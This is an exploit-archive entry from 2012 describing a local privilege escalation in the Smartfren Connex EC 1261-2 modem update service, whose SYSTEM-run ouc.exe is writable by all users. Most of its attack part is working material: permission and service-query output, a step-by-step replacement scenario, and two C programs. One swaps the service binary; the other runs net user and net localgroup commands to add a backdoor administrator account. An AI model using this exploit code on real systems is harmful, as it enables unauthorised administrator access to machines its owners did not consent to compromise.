[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
# Published : 2012-09-27
# Author :
# Previous Title : globalSCAPE CuteZIP Stack Buffer Overflow
# Next Title : Browser Navigation Download Trick


========================================================================== 
Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability 
==========================================================================

:-------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability 
: # Date : 26 September 2012 
: # Author : X-Cisadane 
: # Software Link : http://www.smartfren.com/data/ec1261.html  
: # File Version : 21.005.15.03.836  
: # Category : Desktop (Windows) Applications 
: # Platform : Win32 & Win64 
: # Vulnerability : Local Privilege Escalation Vulnerability 
: # Tested On : Microsoft Windows 7 Ultimate 64 Bit (EN) 
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari
:-------------------------------------------------------------------------------------------------------------------------------------:
Summary
========
Smartfren Connex EC 1261-2 UI OUC is part of Smartfren Connex EC USB EVDO Modem files. 
Smartfren Connex EC 1261-2 UI OUC is a daemon for updating the USB EVDO Modem files of Smartfren Connex.

Description
===========
Improper file permissions on executable file of the application could result on Local Privilege Escalation Vulnerability.
It can be used by a simple user that can change the executable file with a binary of choice. 
The binary (ouc.exe) is set by default to Startup and will be executed with SYSTEM privileges. 
Tested on : Microsoft Windows 7 Ultimate 64 Bit (EN).

Proof of Concept
================
C:Program Files (x86)Smartfren Connex EC1261-2 UIUpdateDog>>cacls ouc.exe
C:Program Files (x86)Smartfren Connex EC1261-2 UIUpdateDogouc.exe 	Everyone:F 
 									BUILTINUsers:F
                                                                      	NT AUTHORITYSYSTEM:(ID)F
                                                                      	BUILTINAdministrators:(ID)F

C:Program Files (x86)Smartfren Connex EC1261-2 UIUpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:Program Files (x86)Smartfren Connex EC1261-2 UIUpdateDogouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Smartfren Connex EC1261-2 UI. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

----------------------------------------------------------------------------------------------
The following attack scenario could be used :
1. An attacker (unprivileged user) rename Smartfren Connex EC1261-2 UI. OUC program file. 
For example, the Smartfren Connex EC1261-2 UI. OUC program file could be :
For Win32 ---> X:Program FilesSmartfren Connex EC1261-2 UIUpdateDogouc.exe (Smartfren Connex EC1261-2 UI Update Manager) 
For Win64 ---> X:Program Files (x86)Smartfren Connex EC1261-2 UIUpdateDogouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
Rename the file to ouc.exe.old
2. An attacker copies his malicious executable file (with same name as the old filename of the FILE - ouc.exe) in the same location.
3. Restart the system.
After restart attackers malicious file will be executed with SYSTEM privileges.

You can also do it with these simple program :
------------------------------------- [ CUT HERE ] -------------------------------------------
Compile these script below with Dev-C++
Save in the C:sploit.cpp

#include <stdio.h>
#include <windows.h>
#define DEFAULT_TARGET  "C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe"
#define DEFAULT_BACKUP  "C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe.old"
#define DEFAULT_EXECUTE "C:\bin.exe"
int main(int argc, char *argv[])
{

     MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
     CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
     return 0;
}
 

Compile these script below with Dev-C++
Save in the C:bin.cpp

#include <stdio.h>
#include <windows.h>
#define CMD "C:\WINDOWS\system32\cmd.exe"
#define ONE "/C net user xcisadane xcisadane /add"
#define TWO "/C net localgroup administrators xcisadane /add"
int main(int argc, char *argv[])
{
STARTUPINFO si = {sizeof(STARTUPINFO)};
PROCESS_INFORMATION pi;
     CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
     CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
     return 0;
}
------------------------------------- [ CUT HERE ] -------------------------------------------
Execute file sploit.exe that located in C:
Reboot your Windows. After reboot, let's check Net User from Command Prompt, if there an user with name xcisadane, so you have successfully!
P.S : For Win32 please change Program Files (x86) to Program Files.